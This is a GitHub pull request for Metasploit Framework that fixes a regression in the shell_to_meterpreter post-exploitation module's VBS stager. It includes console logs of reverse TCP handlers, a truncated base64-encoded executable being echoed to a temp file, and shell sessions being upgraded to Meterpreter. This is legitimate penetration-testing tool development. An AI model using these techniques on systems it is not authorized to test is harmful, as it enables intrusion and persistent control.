### PR TITLE
Fix VBS stager in shell_to_meterpreter.

### LINKED ISSUE #16785: shell_to_meterpreter: OS architecture detection fails on Windows XP SP3
`post/multi/manage/shell_to_meterpreter` fails on Windows XP SP3 x86 over a `windows/shell/reverse_tcp` session. Meterpreter supports Windows XP SP3.

Since #15864, `shell_to_meterpreter` attempts to use `wmic os get osarchitecture` which is not a valid WMIC query on XP SP3.

https://github.com/rapid7/metasploit-framework/blob/f043b121b32664f545c9d96ca43bb7fe84f6385a/modules/post/multi/manage/shell_to_meterpreter.rb#L84-L100

```
msf6> use exploit/multi/handler 
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > set lport 1338
lport => 1338
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.200.130:1338 
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.200.216

[*] Command shell session 1 opened (192.168.200.130:1338 -> 192.168.200.216:1093) at 2022-07-19 03:50:31 -0400


Shell Banner:
Microsoft Windows XP [Version 5.1.2600]
-----
          

C:\Documents and Settings\user\Desktop>systeminfo
systeminfo

Host Name:                 EXPEE
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free

[...]

C:\Documents and Settings\user\Desktop>^Z
Background session 1? [y/N]  y
msf6 exploit(multi/handler) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
msf6 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type               Information                                                  Connection
  --  ----  ----               -----------                                                  ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows XP [Version 5.1.2600] -----  192.168.200.130:1338 -> 192.168.200.216:1093 (192.168.200.216)
```

### PR DESCRIPTION
**Pull request by smashery**
A bug was introduced into the `shell_to_meterpreter` module that prevented the VBS stager from succeeding:

```
msf6 post(multi/manage/shell_to_meterpreter) > run win_transfer=VBS session=1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[-] Error: Unable to execute the following command: "echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAyAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA5JBHdfUV/jn1Ff459RX+OWoMEjn5Ff459RX6Of0V/jnQ96o58RX+OdD3ujnxFf45SaWNofUV/jgAAAAAAAAAAAAAAAAAAAABQRQAAZIYDAH08xksAAAAAAAAAAPAAIwALAgEAADAAAAAQAAAAAAAAAEAAAAAQAAAAAABAAQAAAAAQAAAAAgAABAAAAAAAAAAEAAAAAAAAAEBCAABIAgAA/aAAAAIAAIAAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAAAAAAAAAAADIQQAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADhCAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAABgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAE4QAAAAEAAAABIAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACEAAAAADAAAAACAAAAFgAAAAAAAAAAAAAAAAAAQAAAQC5peXJmAAAAQAIAAABAAAAABAAAABgAAAAAAAAAAAAAAAAAACAAAOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEiD7ChJx8FAAAAAScfAADAAAEjHwgAQAABIM8noJxAAAEjHwQAQAABIvkEQAEABAAAASIv486T/0EgzyegBEAAAUEFZTE9BRDoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\\JEHPU.b64"
[-] Output: "C:\\Users\\smash\\AppData\\Local\\Temp\\rOHTo.vbs(2, 1) Microsoft VBScript compilation error: Expected statement\r\n\r\nCould Not Find C:\\Users\\smash\\AppData\\Local\\Temp\\JEHPU.b64"
[*] Stopping exploit/multi/handler
[*] Post module execution completed
```

The error message is peculiar: apparently VBScript compilation failed while running an `echo` command.

The cause was always calling `cmd_exec` with the last command in the set. Introduced in #16621 - it would coincidentally succeed in most other cases, since they all manage to be single-line scripts (e.g. PowerShell, Bash or Python). But once you use the multi-command VBS stager, it runs the last command, and fails.

This PR, along with #18062, should resolve #16785.

## Verification

- [x] Run a command shell on Windows
- [x] Upgrade it to meterpreter using the VBS stager (`WIN_TRANSFER=VBS`, or just run on XP)
- [x] Verify that upgrading a Python meterpreter still works

### After the fix

```
[*] Using post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > sessions 

Active sessions
===============

  Id  Name  Type               Information                                                                      Connection
  --  ----  ----               -----------                                                                      ----------
  1         shell x86/windows  Shell Banner: Microsoft Windows [Version 10.0.19045.2965] (c) Microsoft Corp...  192.168.20.206:4442 -> 192.168.20.15:13878 (192.168.20.15)

msf6 post(multi/manage/shell_to_meterpreter) > run win_transfer=VBS session=1

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[*] Command stager progress: 14.11% (1699/12045 bytes)
[*] Command stager progress: 28.21% (3398/12045 bytes)
[*] Command stager progress: 42.32% (5097/12045 bytes)
[*] Command stager progress: 56.42% (6796/12045 bytes)
[*] Command stager progress: 70.53% (8495/12045 bytes)
[*] Command stager progress: 84.29% (10153/12045 bytes)
[*] Command stager progress: 98.17% (11825/12045 bytes)
[*] Sending stage (200774 bytes) to 192.168.20.15
[*] Command stager progress: 100.00% (12045/12045 bytes)
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) > [*] Meterpreter session 2 opened (192.168.20.206:4433 -> 192.168.20.15:13882) at 2023-06-06 07:31:15 +1000

[*] Stopping exploit/multi/handler
```

I also verified that the feature that introduced the issue (duplicating Python meterp without hanging) still works:

```
msf6 > sessions 

Active sessions
===============

  Id  Name  Type                      Information           Connection
  --  ----  ----                      -----------           ----------
  1         meterpreter python/linux  smash @ msfdevubuntu  192.168.20.206:5444 -> 192.168.20.206:58536 (192.168.20.206)

msf6 > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.168.20.206:4433 
[*] Command stager progress: 100.00% (773/773 bytes)

[*] Sending stage (1017704 bytes) to 192.168.20.206
msf6 > [*] Meterpreter session 2 opened (192.168.20.206:4433 -> 192.168.20.206:43906) at 2023-06-06 07:33:12 +1000
[*] Stopping exploit/multi/handler
```

### CODE REVIEW

**Comment by sempervictus** [comment]
This is _so_ indicative of the "back-compat problem" w/ MSFT OS', humans having to fix VBS context in 2023... :man_facepalming: - thanks for fixing it.

**Comment by bwatters-r7** [comment]
# Release Notes
This PR fixes a regression that caused some sessions upgrade attempts to fail.
